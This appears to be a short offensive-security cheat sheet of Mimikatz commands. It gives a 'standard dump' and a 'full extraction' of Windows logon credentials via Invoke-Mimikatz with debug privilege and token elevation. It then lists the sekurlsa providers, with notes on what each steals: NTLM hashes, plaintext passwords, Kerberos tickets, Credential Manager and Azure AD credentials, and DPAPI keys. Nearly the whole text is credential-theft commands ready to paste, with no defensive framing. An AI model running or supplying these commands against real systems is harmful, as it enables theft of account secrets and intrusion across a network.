# Standard dump
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
# Full extraction
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::credman" "sekurlsa::wdigest" "sekurlsa::kerberos" "sekurlsa::ssp" "sekurlsa::livessp" "sekurlsa::tspkg" "sekurlsa::cloudap"'
๐ฆ SEKURLSA Providers
sekurlsa::msv # NTLM auth
sekurlsa::wdigest # Plaintext passwords
sekurlsa::kerberos # Kerberos tickets
sekurlsa::tspkg # Terminal Services
sekurlsa::livessp # Live/Outlook creds
sekurlsa::ssp # Security Support Provider
sekurlsa::credman # Credential Manager
sekurlsa::cloudap # Azure AD creds
sekurlsa::dpapi # DPAPI keys